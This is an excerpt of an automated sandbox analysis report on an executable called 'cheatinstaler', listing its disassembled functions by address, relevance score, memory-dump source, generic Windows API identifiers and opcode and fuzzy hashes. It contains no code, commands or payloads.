                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1203560049-0
                                                                                                  • Opcode ID: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
                                                                                                  • Instruction ID: 4ab006c2e4fd4f26a6f228e2d369af936820bd156fdcccbf76305dfd61210052
                                                                                                  • Opcode Fuzzy Hash: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
                                                                                                  • Instruction Fuzzy Hash: C321F823A1878181EF209F2AE4552696361FF88B95F404230EEDE83795EF3CD541DB40
                                                                                                  Function 00007FF6C16C31BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3118131910-0
                                                                                                  • Opcode ID: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
                                                                                                  • Instruction ID: 506e2091648e899b6c8c74e53211a8ee19f75db5b7425405399573c4f79f291e
                                                                                                  • Opcode Fuzzy Hash: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
                                                                                                  • Instruction Fuzzy Hash: 7521F522A1878181EF109F2AF85422E7361FF88B95F508230EADE87B99DF3CD640D740
                                                                                                  Function 00007FF6C16C32BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1203560049-0
                                                                                                  • Opcode ID: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
                                                                                                  • Instruction ID: b20057a7b4ad6b5970d206a8862616607abf2d938509eebeb8db0625a33d0296
                                                                                                  • Opcode Fuzzy Hash: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
                                                                                                  • Instruction Fuzzy Hash: 7E217122A1878181EF109F2AE4542296361FBC9BA5F504331EAED83BE5DF3CD541D744
                                                                                                  Function 00007FF6C16EBF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                                  • Instruction ID: d19da958b8cce5ca7414bb7f2206004e3fee4834de47e694b6a37a3ec5a65c60
                                                                                                  • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                                  • Instruction Fuzzy Hash: 78E04F24B0470646EB54AF779C953792356AF88743F104678C8DE833D6CE3EA5199780
                                                                                                  Function 00007FF6C16BF578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16BF895
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16BF89B
                                                                                                    • Part of subcall function 00007FF6C16C3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6C16D0811), ref: 00007FF6C16C3EFD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                  • String ID:
                                                                                                  • API String ID: 3587649625-0
                                                                                                  • Opcode ID: 31de71ccb13629eb4e8ff473cf0e989b9a8a473b909947ada8621b483159802c
                                                                                                  • Instruction ID: 5df65cd3a7279b27cbda88747a034d17b28115ef4d4d7b34777f9af1603517f2
                                                                                                  • Opcode Fuzzy Hash: 31de71ccb13629eb4e8ff473cf0e989b9a8a473b909947ada8621b483159802c
                                                                                                  • Instruction Fuzzy Hash: 9691D073A18B9190EB10DF26E8442ED6361FB84799F904276FACC87AE9DF78D541E340
                                                                                                  Function 00007FF6C16B3904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: 8a0d7ffcdee688d7cb22665fdd22367b6c642a36889c5767c2428ca75abdd5ff
                                                                                                  • Instruction ID: 45e494287b878c79c12ba0800674c4b03e1899daa0755a2d4c2aff626bded119
                                                                                                  • Opcode Fuzzy Hash: 8a0d7ffcdee688d7cb22665fdd22367b6c642a36889c5767c2428ca75abdd5ff
                                                                                                  • Instruction Fuzzy Hash: 9641D462F1465284FB00DFB6D4402BD2361AF44BD9F249235EEDDA7ADADE38D482A340
                                                                                                  Function 00007FF6C16C2778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6C16C274D), ref: 00007FF6C16C28A9
                                                                                                  • GetLastError.KERNEL32(?,00007FF6C16C274D), ref: 00007FF6C16C28B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2976181284-0
                                                                                                  • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                                  • Instruction ID: 38c571ad01b906e8e092540a8d2c97b5e62b550ba2e6a0ab6375d797bafde024
                                                                                                  • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                                  • Instruction Fuzzy Hash: 8231C522B1BA9282EF605F2BD99067A2350AF04FD6F150135EEDD87790DE3CD545A640
                                                                                                  Function 00007FF6C16B22BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1746051919-0
                                                                                                  • Opcode ID: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
                                                                                                  • Instruction ID: bee590bc828876a1534b40e5a7bed608c1bb81647df45df1b36e0b2d466af150
                                                                                                  • Opcode Fuzzy Hash: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
                                                                                                  • Instruction Fuzzy Hash: F331B022A1978582EB109F26F8553AEB3A1EF84B91F444235EBDC47B95DF3CF540A740
                                                                                                  Function 00007FF6C16C2AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1392018926-0
                                                                                                  • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                                  • Instruction ID: 520aaaba6421139c2b9e2eb452b520df73c8e0982e6b63f901b80f261578f79c
                                                                                                  • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                                  • Instruction Fuzzy Hash: 2621B062F09B8251EF62AE13D4257BA67A0AF0179AF554035DECC87395EF3CD486E200
                                                                                                  Function 00007FF6C16CAAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadString
                                                                                                  • String ID:
                                                                                                  • API String ID: 2948472770-0
                                                                                                  • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                                  • Instruction ID: 492e5445b997d9f55465c0b7e552ac1955c132292c7df525edb9cb8539e09d6f
                                                                                                  • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                                  • Instruction Fuzzy Hash: 5E119071B08A0285EB009F17E864068B7A1BB98FC1F644435CE8ED3722EF7CE6518344
                                                                                                  Function 00007FF6C16C2BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2976181284-0
                                                                                                  • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                                  • Instruction ID: 133fb4a8165389f6192a07a4187cbf6aab94a86fb85aee7c425ee1334bf47c57
                                                                                                  • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                                  • Instruction Fuzzy Hash: 69118431A0864181EF609F66E8906796360FB45BB5F544335EEFD962D5CF3CD592E300
                                                                                                  Function 00007FF6C16B255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Item$RectText$ClientWindowswprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 402765569-0
                                                                                                  • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                                  • Instruction ID: 8f06898a2f4cde76742f291d90376c709f517b37651692b58a787b43d4c0eab0
                                                                                                  • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                                  • Instruction Fuzzy Hash: FD017511A0D64A41FF555F53A4786B953925F45786F184038E8CE863DADE6CF884E310
                                                                                                  Function 00007FF6C16CEB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6C16CEBAD,?,?,?,?,00007FF6C16C5752,?,?,?,00007FF6C16C56DE), ref: 00007FF6C16CEB5C
                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF6C16CEB6F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                                  • String ID:
                                                                                                  • API String ID: 1231390398-0
                                                                                                  • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                                  • Instruction ID: 1d4b96099b933303300d56fd517a2b9472a053a66895646a37f2ad548105b352
                                                                                                  • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                                  • Instruction Fuzzy Hash: 79E02B61F1454742DF189F57C4505E973A2BFC8B41B848036D68BC3714DE2CE1458B00
                                                                                                  Function 00007FF6C16E21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1173176844-0
                                                                                                  • Opcode ID: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
                                                                                                  • Instruction ID: 294cc526566667cba3fa2bcb5ab9a4aabd279c6c9ac2176b7d811d2cb17f033e
                                                                                                  • Opcode Fuzzy Hash: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
                                                                                                  • Instruction Fuzzy Hash: B4E0EC44E1910745FF286A771C251B501410F69373E1C5738DBFE886C2AE1CE791B590
                                                                                                  Function 00007FF6C16ED90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 588628887-0
                                                                                                  • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                                  • Instruction ID: ab2062745c4c1529127289c903adf81f4bc25aed64a0bbe415bfe4bab52bcbf4
                                                                                                  • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                                  • Instruction Fuzzy Hash: 81E08C60F0910346FF08AFB3DC452B813915F94B53F080134C9DDC6352EE2CA692A640
                                                                                                  Function 00007FF6C16B33E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: af39ee99099a55e795e80951e1502b6695bf377bb292aa42fe2ae5656993095e
